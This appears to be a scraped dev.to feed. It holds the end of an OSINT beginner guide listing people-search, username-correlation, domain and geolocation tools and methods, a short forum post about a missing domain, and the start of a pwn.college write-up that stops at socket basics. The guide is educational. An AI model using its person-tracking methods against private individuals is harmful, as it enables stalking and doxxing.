  General People Search
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Pipl&lt;/strong&gt;: Comprehensive people search engine (paid)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Spokeo&lt;/strong&gt;: People search engine with contact info and social profiles&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;That's Them&lt;/strong&gt;: Free people and business search&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hunter.io&lt;/strong&gt;: Find email addresses by domain name&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Clearbit Connect&lt;/strong&gt;: Find email addresses and company information&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Public Records
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;BeenVerified&lt;/strong&gt;: Background check service (paid)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;TruthFinder&lt;/strong&gt;: Public records search (paid)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PACER&lt;/strong&gt;: Public Access to Court Electronic Records (US)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SearchSystems&lt;/strong&gt;: Directory of free public records&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Username and Identity
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Namechk&lt;/strong&gt;: Check username availability across multiple platforms&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;WhatsMyName&lt;/strong&gt;: Find usernames across many platforms&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sherlock&lt;/strong&gt;: Command-line tool to find usernames across social networks&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GHunt&lt;/strong&gt;: Investigate Google accounts with an email&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Website and Domain Analysis Tools
&lt;/h3&gt;

&lt;h4&gt;
  
  
  WHOIS and Domain Tools
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;ICANN WHOIS&lt;/strong&gt;: Official WHOIS lookup for domain registration information&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;DomainTools&lt;/strong&gt;: Comprehensive domain intelligence (paid)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ViewDNS.info&lt;/strong&gt;: Multiple DNS and domain lookup tools&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Whoxy&lt;/strong&gt;: WHOIS search with historical data (paid)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Website Analysis
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;BuiltWith&lt;/strong&gt;: Discover what technologies websites are using&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Wappalyzer&lt;/strong&gt;: Browser extension that identifies web technologies&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SpyOnWeb&lt;/strong&gt;: Find websites sharing the same tracking codes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Similar Web&lt;/strong&gt;: Website traffic and analytics&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Historical Analysis
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Wayback Machine&lt;/strong&gt;: View archived versions of websites&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Archive.today&lt;/strong&gt;: Another web archiving service&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cached View&lt;/strong&gt;: View Google's cached version of pages&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Security and Infrastructure
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Shodan&lt;/strong&gt;: Search engine for internet-connected devices&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Censys&lt;/strong&gt;: Search engine for internet devices and certificates&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SecurityTrails&lt;/strong&gt;: DNS, domain, and IP intelligence&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;VirusTotal&lt;/strong&gt;: Analyze suspicious websites and files&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Geolocation and Mapping Tools
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Mapping Platforms
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Google Maps&lt;/strong&gt;: Comprehensive mapping with Street View and satellite imagery&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Google Earth&lt;/strong&gt;: 3D representation of Earth with historical imagery&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Bing Maps&lt;/strong&gt;: Alternative mapping platform with Bird's Eye view&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OpenStreetMap&lt;/strong&gt;: Open-source mapping platform with detailed data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Wikimapia&lt;/strong&gt;: Crowdsourced map with annotated locations&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Specialized Geolocation Tools
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;SunCalc&lt;/strong&gt;: Calculate sun positions and phases for any location and time&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ShadowCalculator&lt;/strong&gt;: Analyze shadows to determine time and location&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GeoGuessr&lt;/strong&gt;: Practice geolocation skills with a game format&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Mapillary&lt;/strong&gt;: Crowdsourced street-level imagery&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Location Data Tools
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;IP Geolocation&lt;/strong&gt;: Tools like IP2Location and MaxMind&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What3Words&lt;/strong&gt;: Location reference system using three words&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ExifTool&lt;/strong&gt;: Extract location data from image metadata&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Image and Media Analysis Tools
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Reverse Image Search
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Google Images&lt;/strong&gt;: Find similar images and sources&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;TinEye&lt;/strong&gt;: Reverse image search with historical results&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Yandex Images&lt;/strong&gt;: Often finds matches that Google misses&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Bing Visual Search&lt;/strong&gt;: Microsoft's reverse image search&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Metadata Analysis
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;ExifTool&lt;/strong&gt;: Extract metadata from images and files&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Jeffrey's Image Metadata Viewer&lt;/strong&gt;: Online EXIF data viewer&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Forensically&lt;/strong&gt;: Digital image forensics tool&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;FotoForensics&lt;/strong&gt;: Error Level Analysis and metadata extraction&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Video Analysis
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;InVID&lt;/strong&gt;: Video verification plugin&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;YouTube DataViewer&lt;/strong&gt;: Extract hidden metadata from YouTube videos&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Frame by Frame&lt;/strong&gt;: Analyze videos frame by frame&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Data Organization and Visualization Tools
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Note-Taking and Organization
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Hunchly&lt;/strong&gt;: Capture and organize web pages during investigations&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Notion&lt;/strong&gt;: All-in-one workspace for notes and databases&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Obsidian&lt;/strong&gt;: Knowledge base with linked notes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Joplin&lt;/strong&gt;: Open-source note-taking with encryption&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Link Analysis and Visualization
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Maltego&lt;/strong&gt;: Interactive data mining and visualization&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Gephi&lt;/strong&gt;: Open-source network visualization software&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;NodeXL&lt;/strong&gt;: Excel template for network analysis&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Timeline Tools
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Timeline JS&lt;/strong&gt;: Create interactive timelines&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Aeon Timeline&lt;/strong&gt;: Timeline visualization software (paid)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tiki-Toki&lt;/strong&gt;: Web-based timeline maker&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Data Analysis
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;OpenRefine&lt;/strong&gt;: Clean and transform data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tableau Public&lt;/strong&gt;: Data visualization platform&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;R with RStudio&lt;/strong&gt;: Statistical computing and graphics&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Python with Jupyter Notebooks&lt;/strong&gt;: Data analysis and visualization&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Automation and Programming Tools
&lt;/h3&gt;

&lt;h4&gt;
  
  
  OSINT Frameworks
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Recon-ng&lt;/strong&gt;: Web reconnaissance framework&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SpiderFoot&lt;/strong&gt;: Automated OSINT collection platform&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;theHarvester&lt;/strong&gt;: Email, subdomain, and name harvester&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Key Python Libraries
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Requests&lt;/strong&gt;: HTTP library for web requests&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Beautiful Soup&lt;/strong&gt;: Web scraping library&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Selenium&lt;/strong&gt;: Browser automation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tweepy&lt;/strong&gt;: Twitter API library&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;NLTK&lt;/strong&gt;: Natural Language Toolkit for text analysis&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Pandas&lt;/strong&gt;: Data analysis library&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;NetworkX&lt;/strong&gt;: Network analysis and visualization&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  5) Digital Footprint Investigation
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Understanding Digital Footprint Types
&lt;/h3&gt;

&lt;p&gt;Digital footprints can be categorized into two main types:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Active Digital Footprints&lt;/strong&gt; (intentionally created):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Social media posts and profiles&lt;/li&gt;
&lt;li&gt;Blog comments and forum participation&lt;/li&gt;
&lt;li&gt;Online reviews and ratings&lt;/li&gt;
&lt;li&gt;Publicly shared photos and videos&lt;/li&gt;
&lt;li&gt;Website registrations and account creation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Passive Digital Footprints&lt;/strong&gt; (created without direct user action):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;IP address logs and geolocation data&lt;/li&gt;
&lt;li&gt;Browser cookies and tracking pixels&lt;/li&gt;
&lt;li&gt;Metadata embedded in files&lt;/li&gt;
&lt;li&gt;Server access logs&lt;/li&gt;
&lt;li&gt;Third-party data collection&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Username Analysis and Correlation
&lt;/h3&gt;

&lt;p&gt;Username analysis is often the starting point for digital footprint investigations. Users often employ patterns when creating usernames:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Consistent base name with platform-specific suffixes&lt;/li&gt;
&lt;li&gt;Professional vs. personal username variations&lt;/li&gt;
&lt;li&gt;Age-related patterns (birth years, graduation years)&lt;/li&gt;
&lt;li&gt;Geographic indicators (city codes, area codes)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Systematic username investigation involves&lt;/strong&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Starting with known usernames from target profiles&lt;/li&gt;
&lt;li&gt;Generating variations and checking multiple platforms&lt;/li&gt;
&lt;li&gt;Documenting all discovered accounts&lt;/li&gt;
&lt;li&gt;Correlating information across platforms&lt;/li&gt;
&lt;li&gt;Identifying patterns that suggest the same individual&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Email Address Investigation Techniques
&lt;/h3&gt;

&lt;p&gt;Email addresses are powerful investigative tools that can reveal extensive information about an individual's online presence.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Approaches include&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Username extraction&lt;/strong&gt;: The local part (before @) often serves as a username&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Domain analysis&lt;/strong&gt;: Corporate, educational, or free email providers reveal affiliations&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Account discovery&lt;/strong&gt;: Finding services registered with the email&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Historical analysis&lt;/strong&gt;: Tracking email usage over time&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Associated accounts&lt;/strong&gt;: Identifying linked social media and service accounts&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Reverse Image Search and Visual Analysis
&lt;/h3&gt;

&lt;p&gt;Images contain valuable metadata and can be found across multiple platforms, making them powerful tools for digital footprint analysis.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Image Verification Process&lt;/strong&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Perform reverse image search across multiple engines&lt;/li&gt;
&lt;li&gt;Check for image manipulation or editing&lt;/li&gt;
&lt;li&gt;Extract and analyze metadata (if available)&lt;/li&gt;
&lt;li&gt;Compare with known authentic images&lt;/li&gt;
&lt;li&gt;Document all findings and sources&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  6) Geolocation Techniques
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Introduction to Geolocation
&lt;/h3&gt;

&lt;p&gt;Geolocation is one of the most valuable skills in an OSINT investigator's toolkit. It involves determining the physical location where a photo or video was taken, or where a person or object is located, using only publicly available information.&lt;/p&gt;

&lt;h3&gt;
  
  
  Visual Clues in Geolocation
&lt;/h3&gt;

&lt;p&gt;Successful geolocation often begins with careful observation of visual elements:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Architectural Features&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Building styles and materials&lt;/li&gt;
&lt;li&gt;Distinctive landmarks or structures&lt;/li&gt;
&lt;li&gt;Roof designs and colors&lt;/li&gt;
&lt;li&gt;Street layouts and urban planning characteristics&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Environmental Indicators&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Vegetation types and patterns&lt;/li&gt;
&lt;li&gt;Terrain features (mountains, coastlines, etc.)&lt;/li&gt;
&lt;li&gt;Climate indicators (snow, desert conditions, etc.)&lt;/li&gt;
&lt;li&gt;Water features (rivers, lakes, oceans)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Human Elements&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Language on signs and advertisements&lt;/li&gt;
&lt;li&gt;Vehicle types, license plates, and driving side&lt;/li&gt;
&lt;li&gt;Clothing styles and cultural indicators&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Infrastructure&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Road markings and traffic signs&lt;/li&gt;
&lt;li&gt;Utility poles and street lighting&lt;/li&gt;
&lt;li&gt;Construction styles for bridges, barriers, etc.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Shadow Analysis
&lt;/h3&gt;

&lt;p&gt;Shadow analysis is a powerful technique for determining the time of day, time of year, and even the hemisphere where an image was taken.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Basic Principles&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;In the Northern Hemisphere, shadows point northward during midday&lt;/li&gt;
&lt;li&gt;In the Southern Hemisphere, shadows point southward during midday&lt;/li&gt;
&lt;li&gt;Shadow length varies by time of day and season&lt;/li&gt;
&lt;li&gt;Shadow direction changes throughout the day as the sun moves east to west&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Shadow Analysis Process&lt;/strong&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Identify vertical objects and their shadows in the image&lt;/li&gt;
&lt;li&gt;Determine the shadow direction relative to the object&lt;/li&gt;
&lt;li&gt;Estimate the shadow length relative to the object's height&lt;/li&gt;
&lt;li&gt;Use tools like SunCalc.org to match potential dates and times&lt;/li&gt;
&lt;li&gt;Cross-reference with other visual clues&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Geolocation Workflow
&lt;/h3&gt;

&lt;p&gt;Successful geolocation typically follows a methodical workflow:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Initial Assessment&lt;/strong&gt;: Examine the image carefully and note all potential clues&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Metadata Check&lt;/strong&gt;: Extract and analyze any available EXIF data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Clue Prioritization&lt;/strong&gt;: Identify the most distinctive or unique elements&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Research&lt;/strong&gt;: Research unfamiliar elements (e.g., architectural styles, signage)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Narrowing Down&lt;/strong&gt;: Use clues to narrow the geographic area&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Mapping Tool Search&lt;/strong&gt;: Use satellite imagery and mapping tools&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Verification&lt;/strong&gt;: Confirm the location by matching multiple elements&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Documentation&lt;/strong&gt;: Document your findings and the process used&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  7) GIS for OSINT
&lt;/h2&gt;

&lt;h3&gt;
  
  
  GIS Fundamentals
&lt;/h3&gt;

&lt;p&gt;Geographic Information Systems (GIS) are powerful tools that can significantly enhance OSINT investigations by providing spatial context to information.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key GIS Concepts&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Spatial Data&lt;/strong&gt;: Information identifying geographic location of features and boundaries&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layers&lt;/strong&gt;: Different sets of spatial data that can be overlaid on a map&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Vector Data&lt;/strong&gt;: Represents features as points, lines, and polygons&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Raster Data&lt;/strong&gt;: Represents features as a grid of cells or pixels (e.g., satellite imagery)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Attributes&lt;/strong&gt;: Non-spatial information associated with geographic features&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Geocoding&lt;/strong&gt;: Converting addresses to geographic coordinates&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Spatial Analysis&lt;/strong&gt;: Examining locations, attributes, and relationships of features&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  GIS Tools for OSINT
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Web-Based GIS Tools&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Google Earth Web&lt;/strong&gt;: Browser-based version with historical imagery&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Google Maps&lt;/strong&gt;: Familiar interface with Street View and measurements&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Bing Maps&lt;/strong&gt;: Alternative with Bird's Eye view&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OpenStreetMap&lt;/strong&gt;: Community-driven map with detailed infrastructure data&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Desktop GIS Software&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Google Earth Pro&lt;/strong&gt;: Free desktop application with advanced features&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;QGIS&lt;/strong&gt;: Powerful open-source GIS software&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ArcGIS&lt;/strong&gt;: Commercial GIS software with extensive capabilities&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Specialized OSINT GIS Tools&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Heatmap.io&lt;/strong&gt;: Create heat maps from location data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Echosec&lt;/strong&gt;: Social media monitoring with geospatial capabilities&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Learning Resources
&lt;/h2&gt;

&lt;h3&gt;
  
  
  OSINT Training and Education
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Comprehensive OSINT Resources&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://osintframework.com/" rel="noopener noreferrer"&gt;&lt;strong&gt;OSINT Framework&lt;/strong&gt;&lt;/a&gt; - Centralized directory of OSINT tools&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/K2SOsint/Legendary_OSINT" rel="noopener noreferrer"&gt;&lt;strong&gt;Legendary OSINT&lt;/strong&gt;&lt;/a&gt; - Curated list of OSINT tools and resources&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://giriaryan694-a11y.github.io/ary.osint/" rel="noopener noreferrer"&gt;&lt;strong&gt;ary.osint&lt;/strong&gt;&lt;/a&gt; - Comprehensive OSINT toolkit with 100+ tools&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Google OSINT Guide&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://github.com/Nervi0z/Google-OSINT" rel="noopener noreferrer"&gt;&lt;strong&gt;Practical Google OSINT guide&lt;/strong&gt;&lt;/a&gt; - Covers operators, dorking, reverse image search, geospatial intelligence&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;OSINT Training&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://osinttraining.net/" rel="noopener noreferrer"&gt;&lt;strong&gt;KeyNorth Group OSINT Training&lt;/strong&gt;&lt;/a&gt; - Free online OSINT training with practical exercises&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Geolocation Resources
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://www.suncalc.org/" rel="noopener noreferrer"&gt;&lt;strong&gt;SunCalc&lt;/strong&gt;&lt;/a&gt; - Analyze sun positions and shadows for any location and date&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://bellingcat.gitbook.io/" rel="noopener noreferrer"&gt;&lt;strong&gt;Bellingcat's Guide to Geolocation&lt;/strong&gt;&lt;/a&gt; - Detailed guide on using shadows for geolocation&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  GIS Resources
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://www.qgistutorials.com/" rel="noopener noreferrer"&gt;&lt;strong&gt;QGIS Tutorials and Tips&lt;/strong&gt;&lt;/a&gt; - Free, comprehensive tutorials for QGIS&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.esri.com/training/" rel="noopener noreferrer"&gt;&lt;strong&gt;Esri Training&lt;/strong&gt;&lt;/a&gt; - Some free courses on GIS fundamentals&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://earthexplorer.usgs.gov/" rel="noopener noreferrer"&gt;&lt;strong&gt;USGS Earth Explorer&lt;/strong&gt;&lt;/a&gt; - Free satellite imagery and aerial photos&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.naturalearthdata.com/" rel="noopener noreferrer"&gt;&lt;strong&gt;Natural Earth&lt;/strong&gt;&lt;/a&gt; - Free vector and raster map data&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.openstreetmap.org/" rel="noopener noreferrer"&gt;&lt;strong&gt;OpenStreetMap&lt;/strong&gt;&lt;/a&gt; - Free, editable map of the world&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  OSINT Communities
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;r/OSINT&lt;/strong&gt; - Reddit community with frequent GIS-related discussions&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Geographic Information Systems Stack Exchange&lt;/strong&gt; - Q&amp;amp;A for GIS professionals&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;OSINT is a powerful discipline that combines technical skills with creative problem-solving and attention to detail. The most effective OSINT practitioners develop proficiency with a range of tools while understanding that tools alone are not sufficient—critical thinking and analytical skills remain essential.&lt;/p&gt;

&lt;p&gt;The OSINT process is iterative and requires patience, persistence, and a commitment to ethical practice. As you continue your OSINT journey, remember that the field is constantly evolving. Staying current with new resources and techniques is an important part of OSINT practice.&lt;/p&gt;

&lt;p&gt;Whether you're conducting social media research, geolocation work, or corporate investigations, the skills you've learned in this guide will serve as a solid foundation for effective OSINT work. With the right tools, techniques, and ethical framework, you can turn scattered public data into actionable intelligence.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Disclaimer: The tools and techniques described in this guide are intended for ethical and legal use only. Always respect privacy, platform terms of service, and applicable laws when conducting OSINT investigations.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Reference: &lt;a href="https://freeosint.github.io/pages/training.html" rel="noopener noreferrer"&gt;FreeOSINT&lt;/a&gt;&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>cybersecurity</category>
      <category>infosec</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>What happened to zeroday.forem.com domain?? I had my posts there an no I cannot find anything. Who should I contact? Any help please</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Tue, 09 Jun 2026 15:58:06 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/what-happened-to-zerodayforemcom-domain-i-had-my-posts-there-an-no-i-cannot-find-anything-who-1c1n</link>
      <guid>https://dev.to/hitanshugedam/what-happened-to-zerodayforemcom-domain-i-had-my-posts-there-an-no-i-cannot-find-anything-who-1c1n</guid>
      <description></description>
      <category>community</category>
      <category>discuss</category>
      <category>web</category>
    </item>
    <item>
      <title>Intercepting Communication on pwn.college's Intro to Cybersecurity Dojo</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Sun, 07 Jun 2026 08:43:47 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/intercepting-communication-on-pwncolleges-intro-to-cybersecurity-dojo-n3</link>
      <guid>https://dev.to/hitanshugedam/intercepting-communication-on-pwncolleges-intro-to-cybersecurity-dojo-n3</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;I recently completed pwn.college's "Intercepting Communication" track inside Intro to Cybersecurity dojo, a series of challenges that took me from the basics of socket programming to executing a full man-in-the-middle (MITM) attack. This post documents what I learned and how each challenge built upon the last.&lt;/p&gt;

&lt;h2&gt;
  
  
  Phase 1: The Basics of Network Communication
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Connect, Send, Shutdown, Listen
&lt;/h3&gt;

&lt;p&gt;These initial challenges taught me the fundamentals of socket programming:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Connect&lt;/strong&gt;: Establishing TCP connections to remote hosts&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Send&lt;/strong&gt;: Transmitting data over established connections&lt;/li&gt;
&lt;li&gt;
